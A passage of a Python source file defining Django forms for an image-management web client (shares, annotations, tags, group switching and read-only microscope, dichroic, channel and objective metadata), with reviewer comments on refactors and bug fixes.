from .custom_forms import AnnotationModelMultipleChoiceField
from .custom_forms import ObjectModelMultipleChoiceField
from omeroweb.webadmin.custom_forms import ExperimenterModelMultipleChoiceField
from omeroweb.webadmin.custom_forms import GroupModelMultipleChoiceField
from omeroweb.webadmin.custom_forms import GroupModelChoiceField
from omeroweb.webclient.webclient_utils import formatPercentFraction
logger = logging.getLogger(__name__)

##################################################################
# Static values
# TODO: change to reverse
# Help icon served from the static files tree.
help_button = "%swebgateway/img/help16.png" % settings.STATIC_URL
# Tooltip markup shown next to the share "enable" checkbox.
help_enable = (
    '<span class="tooltip" title="Enable/Disable: This option'
    ' allows the owner to keep the access control of the share.">'
    '<img src="%s" /></span>'
) % help_button
# Tooltip markup explaining the share expiry-date format.
help_expire = (
    '<span class="tooltip" title="Expiry date: This date defines'
    " when the share will stop being available. Date format:"
    ' YYYY-MM-DD."><img src="%s" /></span>'
) % help_button
#################################################################
# Non-model Form
class GlobalSearchForm(NonASCIIForm):
    """Single-field form backing the global search box."""

    # Free-text query, rendered as a 25-character text input.
    search_query = forms.CharField(widget=forms.TextInput(attrs={"size": 25}))
class ShareForm(NonASCIIForm):
    """Form for creating or editing a share: message, expiry, enable, members."""

    def __init__(self, *args, **kwargs):
        super(ShareForm, self).__init__(*args, **kwargs)
        try:
            # Probe the initial data first: a missing or empty
            # "shareMembers" key drops us into the fallback variant
            # that has no pre-selected members.
            if kwargs["initial"]["shareMembers"]:
                pass
            self.fields["members"] = ExperimenterModelMultipleChoiceField(
                queryset=kwargs["initial"]["experimenters"],
                initial=kwargs["initial"]["shareMembers"],
                widget=forms.SelectMultiple(attrs={"size": 28}),
            )
        except Exception:
            self.fields["members"] = ExperimenterModelMultipleChoiceField(
                queryset=kwargs["initial"]["experimenters"],
                widget=forms.SelectMultiple(attrs={"size": 28}),
            )
        self.fields.keyOrder = [
            "message",
            "expiration",
            "enable",
            "members",
        ]  # , 'guests']

    message = forms.CharField(widget=forms.Textarea(attrs={"rows": 5, "cols": 50}))
    expiration = forms.CharField(
        max_length=100,
        widget=forms.TextInput(attrs={"size": 10}),
        label="Expiry date",
        help_text=help_expire,
        required=False,
    )
    enable = forms.BooleanField(required=False, help_text=help_enable)
    # guests = MultiEmailField(required=False,
    #     widget=forms.TextInput(attrs={'size':75}))

    def clean_expiration(self):
        """Validate the expiry date: optional, YYYY-MM-DD, must be in the future."""
        raw = self.cleaned_data["expiration"]
        if raw is not None and len(raw) < 1:
            # Blank input means "no expiry".
            return None
        if raw is not None:
            parts = str(raw).rsplit("-")
            try:
                date = datetime.datetime.strptime(
                    "%s-%s-%s" % (parts[0], parts[1], parts[2]), "%Y-%m-%d"
                )
            except Exception:
                raise forms.ValidationError("Date is in the wrong format. YY-MM-DD")
            if time.mktime(date.timetuple()) <= time.time():
                raise forms.ValidationError("Expiry date must be in the future.")
        return raw
class BasketShareForm(ShareForm):
    """ShareForm variant that also lets the user pick images from the basket."""

    def __init__(self, *args, **kwargs):
        super(BasketShareForm, self).__init__(*args, **kwargs)
        initial_data = kwargs["initial"]
        try:
            # Preferred path: pre-select the images chosen in the basket.
            self.fields["image"] = GroupModelMultipleChoiceField(
                queryset=initial_data["images"],
                initial=initial_data["selected"],
                widget=forms.SelectMultiple(attrs={"size": 10}),
            )
        except Exception:
            # No/invalid selection available: offer the plain image list.
            self.fields["image"] = GroupModelMultipleChoiceField(
                queryset=initial_data["images"],
                widget=forms.SelectMultiple(attrs={"size": 10}),
            )
class ContainerForm(NonASCIIForm):
    """Name/description/owner form for containers (projects, datasets, ...)."""

    name = forms.CharField(max_length=250, widget=forms.TextInput(attrs={"size": 45}))
    description = forms.CharField(
        widget=forms.Textarea(attrs={"rows": 2, "cols": 49}), required=False
    )
    # Hidden: populated by the view, not edited directly by the user.
    owner = forms.CharField(widget=forms.HiddenInput, required=False)
class ContainerNameForm(NonASCIIForm):
    """Standalone form for renaming a container."""

    name = forms.CharField(max_length=250, widget=forms.TextInput(attrs={"size": 45}))
class ContainerDescriptionForm(NonASCIIForm):
    """Standalone form for editing a container's description."""

    description = forms.CharField(
        widget=forms.Textarea(attrs={"rows": 3, "cols": 39}), required=False
    )
class BaseAnnotationForm(NonASCIIForm):
    """
    This is the superclass of the various forms used for annotating single or
    multiple objects.

    All these forms use hidden fields to specify the object(s) currently being
    annotated.
    """

    # (field name, key used in kwargs["initial"] and kwargs["initial"]["selected"]).
    # Order matters: fields are added to the form in this sequence.
    _OBJECT_TYPES = (
        ("image", "images"),
        ("dataset", "datasets"),
        ("project", "projects"),
        ("screen", "screens"),
        ("plate", "plates"),
        ("acquisition", "acquisitions"),
        ("well", "wells"),
        ("share", "shares"),
    )

    def __init__(self, *args, **kwargs):
        # Previously this constructor repeated the same ~17-line
        # try/except field construction eight times; the table-driven
        # loop below is behaviorally identical.
        super(BaseAnnotationForm, self).__init__(*args, **kwargs)
        initial = kwargs["initial"]
        for field_name, key in self._OBJECT_TYPES:
            objects = key in initial and initial[key] or list()
            if len(objects) > 0:
                self._add_object_field(field_name, key, objects, initial)

    def _add_object_field(self, field_name, key, objects, initial):
        """Add one hidden multi-select for *objects*, falling back to an
        unselected field when the initial selection is missing or invalid."""
        try:
            self.fields[field_name] = ObjectModelMultipleChoiceField(
                queryset=objects,
                initial=initial["selected"][key],
                widget=forms.SelectMultiple(attrs={"size": 10}),
                required=False,
            )
        except Exception:
            self.fields[field_name] = ObjectModelMultipleChoiceField(
                queryset=objects,
                widget=forms.SelectMultiple(attrs={"size": 10}),
                required=False,
            )
class TagsAnnotationForm(BaseAnnotationForm):
    """
    Form for annotating one or more objects with existing Tags or New tags
    """

    def __init__(self, *args, **kwargs):
        super(TagsAnnotationForm, self).__init__(*args, **kwargs)

    # Comma-separated list of existing tag IDs, populated by client-side JS.
    tags = forms.CharField(required=False, widget=forms.HiddenInput)

    def clean_tags(self):
        """Return the submitted tag IDs as a list of ints ([] when empty).

        Bug fixes: ``map(int, ...)`` is lazy on Python 3, so invalid
        values never raised inside the ``try`` and a map object leaked to
        callers; and ``forms.ValidationError()`` was constructed without
        its required message argument (itself a TypeError).
        """
        data = self.cleaned_data["tags"]
        if not data:
            return []
        try:
            return [int(i) for i in data.split(",")]
        except ValueError:
            raise forms.ValidationError("Tag IDs must be integers")
class NewTagsAnnotationForm(forms.Form):
    """ Helper form for new tags """

    # All fields are hidden: values are supplied by client-side JS.
    tag = forms.CharField(required=True, widget=forms.HiddenInput)
    description = forms.CharField(required=False, widget=forms.HiddenInput)
    # Optional ID of the tagset the new tag should be created under.
    tagset = forms.IntegerField(min_value=1, required=False, widget=forms.HiddenInput)


# Formset allowing several new tags to be created in a single request.
NewTagsAnnotationFormSet = formset_factory(NewTagsAnnotationForm, extra=0)
class FilesAnnotationForm(BaseAnnotationForm):
    """Form for attaching existing or newly-uploaded files to objects."""

    def __init__(self, *args, **kwargs):
        super(FilesAnnotationForm, self).__init__(*args, **kwargs)
        # Existing file annotations available for (re-)linking.
        self.fields["files"] = AnnotationModelMultipleChoiceField(
            queryset=kwargs["initial"]["files"],
            widget=forms.SelectMultiple(attrs={"size": 8, "class": "existing"}),
            required=False,
        )

    # New file to upload and attach.
    annotation_file = forms.FileField(required=False)
class CommentAnnotationForm(BaseAnnotationForm):
    """Form for adding a text comment to the selected objects."""

    comment = forms.CharField(widget=forms.Textarea(attrs={"rows": 2, "cols": 39}))
class ActiveGroupForm(forms.Form):
    """Group-switcher dropdown; changing the selection redirects the browser
    to the change_active_group view.

    Previously the field was constructed twice in nearly identical 15-line
    try/except branches differing only in the optional ``?url=`` query
    component; the duplication is factored out below.
    """

    def __init__(self, *args, **kwargs):
        super(ActiveGroupForm, self).__init__(*args, **kwargs)
        initial = kwargs["initial"]
        # NOTE(review): "url" originates from the request and is embedded
        # in a client-side redirect -- it must be validated against open
        # redirects (CWE-601); confirm the view sanitizes it.
        try:
            query = "?url=" + initial["url"] + "&active_group='"
        except Exception:
            # No (usable) return URL supplied: redirect without it.
            query = "?active_group='"
        onchange = (
            "window.location.href='"
            + reverse(viewname="change_active_group")
            + query
            + "+this.options[this.selectedIndex].value"
        )
        self.fields["active_group"] = GroupModelChoiceField(
            queryset=initial["mygroups"],
            initial=initial["activeGroup"],
            empty_label=None,
            widget=forms.Select(attrs={"onchange": onchange}),
        )
        self.fields.keyOrder = ["active_group"]
class WellIndexForm(forms.Form):
    """Dropdown for picking a field (acquisition index) within a well."""

    def __init__(self, *args, **kwargs):
        super(WellIndexForm, self).__init__(*args, **kwargs)
        rmin, rmax = kwargs["initial"]["range"]
        # Indices are absolute; labels are displayed 1-based.
        index_choices = tuple(
            (str(i), "Field#%i" % (i - rmin + 1)) for i in range(rmin, rmax + 1)
        )
        self.fields["index"] = forms.ChoiceField(
            choices=index_choices,
            widget=forms.Select(
                attrs={
                    "onchange": ("changeField(this.options[this.selectedIndex].value);")
                }
            ),
        )
        self.fields.keyOrder = ["index"]
###############################
# METADATA FORMS
def save_metadata(obj, name, options=False):
    """Build the JS onchange handler that persists one metadata field.

    ``options=True`` reads the selected <option> value (for <select>
    widgets); otherwise the plain input value is submitted.
    """
    if options:
        value_expr = "this.options[this.selectedIndex].value);"
    else:
        value_expr = "this.value);"
    return "javascript:save_metadata(" + str(obj) + ", '" + name + "', " + value_expr
def set_widget_attrs(field, set_class=True):
    """Disable *field*'s widget, optionally tagging it with the
    'disabled-metadata' CSS class used for read-only styling."""
    attrs = field.widget.attrs
    attrs["disabled"] = True
    if set_class:
        attrs["class"] = "disabled-metadata"
class MetadataChannelForm(forms.Form):
    """Read-only form presenting the metadata of one logical channel.

    Every field is rendered disabled (via ``set_widget_attrs``); whenever a
    value cannot be read, the field degrades to an "N/A" placeholder.
    """

    def __init__(self, *args, **kwargs):
        super(MetadataChannelForm, self).__init__(*args, **kwargs)

        def text_widget(onchange):
            # Standard 25-character text input wired to the JS save handler.
            return forms.TextInput(attrs={"size": 25, "onchange": onchange})

        def na_field(label=None):
            # Placeholder shown when the underlying metadata is missing.
            return forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label=label,
                required=False,
            )

        # Logical channel
        logicalCh = kwargs["initial"]["logicalChannel"]
        # NOTE(review): most text fields below pass "name" as the metadata
        # key to save_metadata() regardless of which field they belong to --
        # presumably the server resolves the real attribute; confirm.

        # Name
        try:
            if logicalCh is not None:
                self.fields["name"] = forms.CharField(
                    max_length=100,
                    # Bug fix: save_metadata() requires the field-name
                    # argument; the previous one-argument call raised
                    # TypeError, so this branch always fell through to the
                    # "N/A" fallback even when a channel name existed.
                    widget=text_widget(save_metadata(logicalCh.id, "name")),
                    initial=logicalCh.name,
                    required=False,
                )
            else:
                self.fields["name"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(logicalCh.id, "name")),
                    required=False,
                )
            set_widget_attrs(self.fields["name"])
        except Exception:
            self.fields["name"] = na_field()
            set_widget_attrs(self.fields["name"])

        # excitationWave
        try:
            if logicalCh is not None:
                self.fields["excitationWave"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(logicalCh.id, "name")),
                    initial=kwargs["initial"]["exWave"].getValue(),
                    label=("Excitation (%s)" % kwargs["initial"]["exWave"].getSymbol()),
                    required=False,
                )
            else:
                self.fields["excitationWave"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(logicalCh.id, "name")),
                    label="Excitation",
                    required=False,
                )
            set_widget_attrs(self.fields["excitationWave"])
        except Exception:
            self.fields["excitationWave"] = na_field(label="Excitation")
            set_widget_attrs(self.fields["excitationWave"])

        # emissionWave
        try:
            if logicalCh is not None:
                self.fields["emissionWave"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(logicalCh.id, "name")),
                    initial=kwargs["initial"]["emWave"].getValue(),
                    label=("Emission (%s)" % kwargs["initial"]["emWave"].getSymbol()),
                    required=False,
                )
            else:
                self.fields["emissionWave"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(logicalCh.id, "name")),
                    label="Emission",
                    required=False,
                )
            set_widget_attrs(self.fields["emissionWave"])
        except Exception:
            self.fields["emissionWave"] = na_field(label="Emission")
            set_widget_attrs(self.fields["emissionWave"])

        # ndFilter
        try:
            if logicalCh is not None and logicalCh.ndFilter is not None:
                self.fields["ndFilter"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(logicalCh.id, "name")),
                    initial=formatPercentFraction(logicalCh.ndFilter),
                    label="ND filter (%)",
                    required=False,
                )
            else:
                self.fields["ndFilter"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(logicalCh.id, "name")),
                    label="ND filter (%)",
                    required=False,
                )
            set_widget_attrs(self.fields["ndFilter"], set_class=False)
        except Exception:
            self.fields["ndFilter"] = na_field(label="ND filter (%)")
            set_widget_attrs(self.fields["ndFilter"], set_class=False)

        # pinHoleSize
        try:
            if logicalCh is not None and logicalCh.pinHoleSize is not None:
                self.fields["pinHoleSize"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(logicalCh.id, "name")),
                    initial=logicalCh.pinHoleSize.getValue(),
                    label=("Pin hole size (%s)" % logicalCh.pinHoleSize.getSymbol()),
                    required=False,
                )
            else:
                self.fields["pinHoleSize"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(logicalCh.id, "name")),
                    label="Pin hole size",
                    required=False,
                )
            set_widget_attrs(self.fields["pinHoleSize"], set_class=False)
        except Exception:
            self.fields["pinHoleSize"] = na_field(label="Pin hole size")
            set_widget_attrs(self.fields["pinHoleSize"], set_class=False)

        # fluor
        try:
            if logicalCh is not None:
                self.fields["fluor"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(logicalCh.id, "name")),
                    initial=logicalCh.fluor,
                    required=False,
                )
            else:
                self.fields["fluor"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(logicalCh.id, "name")),
                    required=False,
                )
            set_widget_attrs(self.fields["fluor"], set_class=False)
        except Exception:
            self.fields["fluor"] = na_field()
            set_widget_attrs(self.fields["fluor"], set_class=False)

        # Illumination
        try:
            if logicalCh.getIllumination() is not None:
                self.fields["illumination"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["illuminations"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                logicalCh.id, "illumination", options=True
                            )
                        }
                    ),
                    initial=logicalCh.getIllumination(),
                    required=False,
                )
            else:
                self.fields["illumination"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["illuminations"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                logicalCh.id, "illumination", options=True
                            )
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["illumination"], set_class=False)
        except Exception:
            self.fields["illumination"] = na_field()
            set_widget_attrs(self.fields["illumination"], set_class=False)

        # contrastMethods
        try:
            if logicalCh.contrastMethod is not None:
                self.fields["contrastMethod"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["contrastMethods"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                logicalCh.id, "contrastMethod", options=True
                            )
                        }
                    ),
                    initial=logicalCh.getContrastMethod(),
                    label="Contrast method",
                    required=False,
                )
            else:
                self.fields["contrastMethod"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["contrastMethods"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                logicalCh.id, "contrastMethod", options=True
                            )
                        }
                    ),
                    label="Contrast method",
                    required=False,
                )
            set_widget_attrs(self.fields["contrastMethod"])
        except Exception:
            self.fields["contrastMethod"] = na_field(label="Contrast method")
            set_widget_attrs(self.fields["contrastMethod"])

        # Mode
        try:
            if logicalCh.getMode() is not None:
                self.fields["mode"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["modes"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                logicalCh.id, "mode", options=True
                            )
                        }
                    ),
                    initial=logicalCh.getMode().value,
                    required=False,
                )
            else:
                self.fields["mode"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["modes"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                logicalCh.id, "mode", options=True
                            )
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["mode"])
        except Exception:
            self.fields["mode"] = na_field()
            set_widget_attrs(self.fields["mode"])

        # pockelCellSetting
        try:
            if logicalCh.pockelCellSetting is not None:
                self.fields["pockelCellSetting"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(logicalCh.id, "name")),
                    initial=logicalCh.pockelCellSetting,
                    label="Pockel cell",
                    required=False,
                )
            else:
                self.fields["pockelCellSetting"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(logicalCh.id, "name")),
                    label="Pockel cell",
                    required=False,
                )
            set_widget_attrs(self.fields["pockelCellSetting"])
        except Exception:
            self.fields["pockelCellSetting"] = na_field(label="Pockel cell")
            set_widget_attrs(self.fields["pockelCellSetting"])

        self.fields.keyOrder = [
            "name",
            "excitationWave",
            "emissionWave",
            "ndFilter",
            "pinHoleSize",
            "fluor",
            "illumination",
            "contrastMethod",
            "mode",
            "pockelCellSetting",
        ]
class MetadataDichroicForm(forms.Form):
    """Read-only form presenting the metadata of a dichroic.

    Fields degrade to a disabled "N/A" placeholder when the dichroic or
    the individual attribute is unavailable.
    """

    def __init__(self, *args, **kwargs):
        super(MetadataDichroicForm, self).__init__(*args, **kwargs)

        def text_widget(onchange):
            # Standard 25-character text input wired to the JS save handler.
            return forms.TextInput(attrs={"size": 25, "onchange": onchange})

        def na_field(label=None):
            # Placeholder shown when the underlying metadata is missing.
            return forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label=label,
                required=False,
            )

        # Manufacturer
        try:
            dichroic = kwargs["initial"]["dichroic"]
            if dichroic.manufacturer is not None:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(dichroic.id, "manufacturer")),
                    initial=dichroic.manufacturer,
                    required=False,
                )
            else:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(dichroic.id, "manufacturer")),
                    required=False,
                )
            set_widget_attrs(self.fields["manufacturer"])
        except Exception:
            self.fields["manufacturer"] = na_field()
            set_widget_attrs(self.fields["manufacturer"])

        # Model
        try:
            dichroic = kwargs["initial"]["dichroic"]
            if dichroic.model is not None:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(dichroic.id, "model")),
                    initial=dichroic.model,
                    required=False,
                )
            else:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(dichroic.id, "model")),
                    required=False,
                )
            set_widget_attrs(self.fields["model"])
        except Exception:
            self.fields["model"] = na_field()
            set_widget_attrs(self.fields["model"])

        # Serial number
        try:
            dichroic = kwargs["initial"]["dichroic"]
            if dichroic.serialNumber is not None:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    # Bug fix: pass the dichroic's ID to save_metadata(),
                    # not the serial-number value, consistent with the
                    # manufacturer/model fields above.
                    widget=text_widget(save_metadata(dichroic.id, "serialNumber")),
                    initial=dichroic.serialNumber,
                    label="Serial number",
                    required=False,
                )
            else:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(dichroic.id, "serialNumber")),
                    label="Serial number",
                    required=False,
                )
            set_widget_attrs(self.fields["serialNumber"])
        except Exception:
            self.fields["serialNumber"] = na_field(label="Serial number")
            set_widget_attrs(self.fields["serialNumber"])

        # Lot number
        try:
            dichroic = kwargs["initial"]["dichroic"]
            if dichroic.lotNumber is not None:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    # Bug fix: pass the dichroic's ID, not the lot-number
                    # value (same copy-paste defect as serialNumber).
                    widget=text_widget(save_metadata(dichroic.id, "lotNumber")),
                    initial=dichroic.lotNumber,
                    label="Lot number",
                    required=False,
                )
            else:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(dichroic.id, "lotNumber")),
                    label="Lot number",
                    required=False,
                )
            set_widget_attrs(self.fields["lotNumber"])
        except Exception:
            self.fields["lotNumber"] = na_field(label="Lot number")
            set_widget_attrs(self.fields["lotNumber"])

        self.fields.keyOrder = ["model", "manufacturer", "serialNumber", "lotNumber"]
class MetadataMicroscopeForm(forms.Form):
    """Read-only form presenting the metadata of a microscope.

    Fields degrade to a disabled "N/A" placeholder when the microscope or
    the individual attribute is unavailable.
    """

    def __init__(self, *args, **kwargs):
        super(MetadataMicroscopeForm, self).__init__(*args, **kwargs)

        def text_widget(onchange):
            # Standard 25-character text input wired to the JS save handler.
            return forms.TextInput(attrs={"size": 25, "onchange": onchange})

        def na_field(label=None):
            # Placeholder shown when the underlying metadata is missing.
            return forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label=label,
                required=False,
            )

        # Model
        try:
            microscope = kwargs["initial"]["microscope"]
            if microscope.model is not None:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(microscope.id, "model")),
                    initial=microscope.model,
                    required=False,
                )
            else:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(microscope.id, "model")),
                    required=False,
                )
            set_widget_attrs(self.fields["model"])
        except Exception:
            self.fields["model"] = na_field()
            set_widget_attrs(self.fields["model"])

        # Manufacturer
        try:
            microscope = kwargs["initial"]["microscope"]
            if microscope.manufacturer is not None:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(microscope.id, "manufacturer")),
                    initial=microscope.manufacturer,
                    required=False,
                )
            else:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(microscope.id, "manufacturer")),
                    required=False,
                )
            set_widget_attrs(self.fields["manufacturer"])
        except Exception:
            self.fields["manufacturer"] = na_field()
            set_widget_attrs(self.fields["manufacturer"])

        # Serial number
        try:
            microscope = kwargs["initial"]["microscope"]
            if microscope.serialNumber is not None:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    # Bug fix: this field previously saved under the
                    # "lotNumber" key (copy-paste from the field below),
                    # so edits updated the wrong attribute.
                    widget=text_widget(save_metadata(microscope.id, "serialNumber")),
                    initial=microscope.serialNumber,
                    label="Serial number",
                    required=False,
                )
            else:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(microscope.id, "serialNumber")),
                    label="Serial number",
                    required=False,
                )
            set_widget_attrs(self.fields["serialNumber"])
        except Exception:
            self.fields["serialNumber"] = na_field(label="Serial number")
            set_widget_attrs(self.fields["serialNumber"])

        # Lot number
        try:
            microscope = kwargs["initial"]["microscope"]
            if microscope.lotNumber is not None:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(microscope.id, "lotNumber")),
                    initial=microscope.lotNumber,
                    label="Lot number",
                    required=False,
                )
            else:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=text_widget(save_metadata(microscope.id, "lotNumber")),
                    # Bug fix: was mislabeled "Serial number" (copy-paste),
                    # producing two identically-labeled fields in the UI.
                    label="Lot number",
                    required=False,
                )
            set_widget_attrs(self.fields["lotNumber"])
        except Exception:
            self.fields["lotNumber"] = na_field(label="Lot number")
            set_widget_attrs(self.fields["lotNumber"])

        # Type
        try:
            microscope = kwargs["initial"]["microscope"]
            if microscope.getMicroscopeType() is not None:
                self.fields["type"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["microscopeTypes"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                microscope.id, "type", options=True
                            )
                        }
                    ),
                    initial=microscope.getMicroscopeType().value,
                    required=False,
                )
            else:
                self.fields["type"] = MetadataModelChoiceField(
                    queryset=kwargs["initial"]["microscopeTypes"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": save_metadata(
                                microscope.id, "type", options=True
                            )
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["type"])
        except Exception:
            self.fields["type"] = na_field()
            set_widget_attrs(self.fields["type"])

        self.fields.keyOrder = [
            "model",
            "manufacturer",
            "serialNumber",
            "lotNumber",
            "type",
        ]
class MetadataObjectiveForm(forms.Form):
    """Form for viewing/editing Objective metadata.

    Every field follows the same pattern: if the attribute is set on
    ``kwargs["initial"]["objective"]`` the field is initialised with its
    value; if unset, the field is left blank; if access raises (e.g. the
    attribute is not supported by the model), a read-only "N/A"
    placeholder field is shown instead.
    """

    # Choices for the boolean 'iris' field below.
    # Fix: previously only MetadataObjectiveSettingsForm defined this, so
    # using this base class directly raised AttributeError in the iris
    # section and the field always fell back to the "N/A" placeholder.
    BOOLEAN_CHOICES = (
        ("", "---------"),
        ("True", "True"),
        ("False", "False"),
    )

    def __init__(self, *args, **kwargs):
        super(MetadataObjectiveForm, self).__init__(*args, **kwargs)
        # Model
        try:
            if kwargs["initial"]["objective"].model is not None:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "model"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["objective"].model,
                    required=False,
                )
            else:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "model"
                            ),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["model"])
        except Exception:
            self.fields["model"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["model"])
        # Manufacturer
        try:
            if kwargs["initial"]["objective"].manufacturer is not None:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "manufacturer"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["objective"].manufacturer,
                    required=False,
                )
            else:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "manufacturer"
                            ),
                        }
                    ),
                    required=False,
                )
            set_widget_attrs(self.fields["manufacturer"])
        except Exception:
            self.fields["manufacturer"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            set_widget_attrs(self.fields["manufacturer"])
        # Serial Number
        try:
            if kwargs["initial"]["objective"].serialNumber is not None:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "serialNumber"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["objective"].serialNumber,
                    label="Serial number",
                    required=False,
                )
            else:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "serialNumber"
                            ),
                        }
                    ),
                    label="Serial number",
                    required=False,
                )
            set_widget_attrs(self.fields["serialNumber"])
        except Exception:
            self.fields["serialNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Serial number",
                required=False,
            )
            set_widget_attrs(self.fields["serialNumber"])
        # Lot number
        try:
            if kwargs["initial"]["objective"].lotNumber is not None:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            # fix: save against the objective's id (was
                            # passing the lotNumber *value* as the id)
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "lotNumber"
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["objective"].lotNumber,
                    label="Lot number",
                    required=False,
                )
            else:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            # fix: this branch read a "logicalchannel" key
                            # that is not in 'initial' for this form, so it
                            # always raised and fell through to "N/A"
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id, "lotNumber"
                            ),
                        }
                    ),
                    label="Lot number",
                    required=False,
                )
            set_widget_attrs(self.fields["lotNumber"])
        except Exception:
            self.fields["lotNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Lot number",
                required=False,
            )
            set_widget_attrs(self.fields["lotNumber"])
        # Nominal Magnification
        try:
            if kwargs["initial"]["objective"].nominalMagnification is not None:
                self.fields["nominalMagnification"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id,
                                "nominalMagnification",
                            ),
                        }
                    ),
                    initial=kwargs["initial"]["objective"].nominalMagnification,
                    label="Nominal magnification",
                    required=False,
                )
            else:
                self.fields["nominalMagnification"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": save_metadata(
                                kwargs["initial"]["objective"].id,
                                "nominalMagnification",
                            ),
                        }
                    ),
                    label="Nominal magnification",
                    required=False,
                )
